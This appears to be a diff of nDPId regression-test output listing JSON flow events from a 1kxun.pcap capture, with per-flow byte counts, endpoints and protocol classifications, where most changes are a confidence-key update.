+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184845,"flow_last_seen":1654385185166,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184857,"flow_last_seen":1654385185942,"flow_idle_time":7580000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1214,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1654385176794,"flow_last_seen":1654385178653,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":19289,"flow_tot_l4_payload_len":216361,"flow_avg_l4_payload_len":6363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1654385176795,"flow_last_seen":1654385178226,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":24480,"flow_tot_l4_payload_len":116983,"flow_avg_l4_payload_len":4874,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1654385176794,"flow_last_seen":1654385178039,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":12423,"flow_tot_l4_payload_len":87831,"flow_avg_l4_payload_len":3992,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229460,"flow_last_seen":1654385229568,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":694,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.235.204.9","src_port":40204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1654385142780,"flow_last_seen":1654385142861,"flow_idle_time":7580000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":28083,"flow_avg_l4_payload_len":2160,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.34","src_port":38354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1654385145219,"flow_last_seen":1654385147933,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":248006,"flow_avg_l4_payload_len":4350,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1654385146263,"flow_last_seen":1654385158374,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":15840,"flow_tot_l4_payload_len":195184,"flow_avg_l4_payload_len":3753,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385146253,"flow_last_seen":1654385148239,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":144162,"flow_avg_l4_payload_len":4004,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1654385146276,"flow_last_seen":1654385147585,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":18720,"flow_tot_l4_payload_len":98936,"flow_avg_l4_payload_len":3091,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1654385146284,"flow_last_seen":1654385147935,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":133307,"flow_avg_l4_payload_len":4300,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385134408,"flow_last_seen":1654385136566,"flow_idle_time":7580000,"flow_min_l4_payload_len":225,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":1447,"flow_avg_l4_payload_len":361,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.119.80","src_port":49242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1654385146276,"flow_last_seen":1654385147926,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":128312,"flow_avg_l4_payload_len":4935,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184174,"flow_last_seen":1654385184282,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":1374,"flow_avg_l4_payload_len":687,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156962,"flow_last_seen":1654385157145,"flow_idle_time":7580000,"flow_min_l4_payload_len":682,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1794,"flow_avg_l4_payload_len":897,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156971,"flow_last_seen":1654385157153,"flow_idle_time":7580000,"flow_min_l4_payload_len":766,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1880,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156978,"flow_last_seen":1654385157162,"flow_idle_time":7580000,"flow_min_l4_payload_len":508,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1626,"flow_avg_l4_payload_len":813,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156997,"flow_last_seen":1654385157178,"flow_idle_time":7580000,"flow_min_l4_payload_len":680,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1793,"flow_avg_l4_payload_len":896,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385157001,"flow_last_seen":1654385157186,"flow_idle_time":7580000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":1023,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385141046,"flow_last_seen":1654385141076,"flow_idle_time":7580000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":2351,"flow_avg_l4_payload_len":587,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385235892,"flow_last_seen":1654385236487,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1663,"flow_avg_l4_payload_len":831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1654385143337,"flow_last_seen":1654385143386,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":20884,"flow_avg_l4_payload_len":1898,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385232006,"flow_last_seen":1654385232057,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":668,"flow_tot_l4_payload_len":1227,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385229375,"flow_last_seen":1654385231942,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3139,"flow_avg_l4_payload_len":523,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1654385229377,"flow_last_seen":1654385229406,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385232040,"flow_last_seen":1654385234239,"flow_idle_time":7580000,"flow_min_l4_payload_len":598,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":3050,"flow_avg_l4_payload_len":762,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183491,"flow_last_seen":1654385183514,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":1204,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183496,"flow_last_seen":1654385183520,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":1640,"flow_tot_l4_payload_len":2431,"flow_avg_l4_payload_len":1215,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183495,"flow_last_seen":1654385183517,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":1191,"flow_avg_l4_payload_len":595,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183618,"flow_last_seen":1654385183642,"flow_idle_time":7580000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":1485,"flow_avg_l4_payload_len":742,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127293,"flow_last_seen":1654385127488,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":734,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119050,"flow_last_seen":1654385119358,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119973,"flow_last_seen":1654385120216,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385120896,"flow_last_seen":1654385121164,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1654385232158,"flow_last_seen":1654385232180,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2540,"flow_avg_l4_payload_len":508,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229378,"flow_last_seen":1654385229413,"flow_idle_time":7580000,"flow_min_l4_payload_len":353,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1602,"flow_avg_l4_payload_len":801,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1654385131029,"flow_last_seen":1654385180912,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":635658,"flow_avg_l4_payload_len":5996,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385181857,"flow_last_seen":1654385181897,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":983,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":696,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 